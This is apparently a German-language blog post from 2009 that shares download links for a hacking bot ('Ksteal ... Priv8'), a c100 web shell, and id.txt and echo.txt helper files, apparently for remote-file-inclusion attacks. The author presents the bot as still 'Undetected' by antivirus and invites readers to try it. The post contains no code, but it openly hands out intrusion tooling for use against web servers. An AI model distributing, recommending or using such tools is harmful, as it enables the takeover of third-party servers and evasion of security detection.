*  Beta v. 2.0a - Project x300                                                                   
*  Written by Captain Crunch Team                                                          
*  Modified by Shadow & Preddy                                                              
*  Re-Modified by SoH-uNi (23.6.08)



So hier jetzt der Downloadlink für den bot und die tools :)


Download :

Ksteal.by.Osyris.Priv8.mod.by.1x33x7
http://www.ziddu.com/downloadfile/1887743/KstealbyOsyrisPriv8modby1x33x7.rar.html

id.txt
http://www.ziddu.com/downloadfile/1887744/id.rar.html

echo.txt
http://www.ziddu.com/downloadfile/1887746/echo.rar.html

c100 Shell
http://www.ziddu.com/downloadfile/1887745/c100.rar.html


So viel Spaß beim rumspielen und testen :) solange er noch Undetected ist :D was sicherlich nichtmehr lange
anhalten wird denke ich mal.



Einen schönen Tag wünsche ich euch weiterhin noch
mfg Bloody

















von Bloody
Kommentar hinzufügen - Kommentare (0) - empfehlen

Zufallsbilder

  • funny1.jpg

Forum

1x33x7_Forum (NEW)

Kalender

November 2009
M D M D F S S
            1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30            
<< < > >>

Neueste Kommentare

Erstellen Sie einen Blog auf de.over-blog.com - Kontakt - Nutzungsbedingungen - Missbrauch melden